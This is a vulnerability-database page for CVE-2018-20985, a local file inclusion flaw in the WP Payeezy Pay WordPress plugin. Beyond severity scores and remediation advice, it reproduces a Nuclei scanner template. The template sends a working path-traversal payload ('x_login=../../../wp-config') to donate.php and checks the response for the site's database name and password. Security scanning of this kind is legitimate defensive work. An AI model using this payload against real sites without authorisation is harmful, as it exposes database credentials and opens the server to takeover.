Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2018-20985
HistoryJul 22, 2021 - 8:35 a.m.

WordPress Payeezy Pay <=2.97 - Local File Inclusion

2021-07-2208:35:12
ProjectDiscovery
github.com
1

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

8.9 High

AI Score

Confidence

High

0.009 Low

EPSS

Percentile

82.6%

WordPress Plugin WP Payeezy Pay is prone to a local file inclusion vulnerability because it fails to sufficiently verify user-supplied input. Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks. WordPress Plugin WP Payeezy Pay version 2.97 is vulnerable; prior versions are also affected.

id: CVE-2018-20985

info:
  name: WordPress Payeezy Pay <=2.97 - Local File Inclusion
  author: daffainfo
  severity: critical
  description: WordPress Plugin WP Payeezy Pay is prone to a local file inclusion vulnerability because it fails to sufficiently verify user-supplied input. Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks. WordPress Plugin WP Payeezy Pay version 2.97 is vulnerable; prior versions are also affected.
  impact: |
    The vulnerability allows an attacker to include local files and execute arbitrary code on the server.
  remediation: |
    Update to the latest version of WordPress Payeezy Pay plugin.
  reference:
    - https://www.pluginvulnerabilities.com/2018/12/06/our-improved-proactive-monitoring-has-now-caught-a-local-file-inclusion-lfi-vulnerability-as-well/
    - https://wordpress.org/plugins/wp-payeezy-pay/#developers
    - https://nvd.nist.gov/vuln/detail/CVE-2018-20985
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2018-20985
    cwe-id: CWE-20
    epss-score: 0.01061
    epss-percentile: 0.84101
    cpe: cpe:2.3:a:payeezy:wp_payeezy_pay:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: payeezy
    product: wp_payeezy_pay
    framework: wordpress
  tags: cve,cve2018,wordpress,lfi,plugin,payeezy

http:
  - method: POST
    path:
      - "{{BaseURL}}/wp-content/plugins/wp-payeezy-pay/donate.php"

    body: "x_login=../../../wp-config"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "The base configuration for WordPress"
          - "define( 'DB_NAME',"
          - "define( 'DB_PASSWORD',"
        condition: and

      - type: status
        status:
          - 200
# digest: 490a004630440220465e274aa68efa6686c443bbbe9e61467f303374cdbc4a1a88bee6a3a4e792ef02201c9beb67a520e6effc9618566ca883bd170c9262e7ae52530ec543ba9390b37a:922c64590222798bb761d5b6d8e72950

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

8.9 High

AI Score

Confidence

High

0.009 Low

EPSS

Percentile

82.6%

Related for NUCLEI:CVE-2018-20985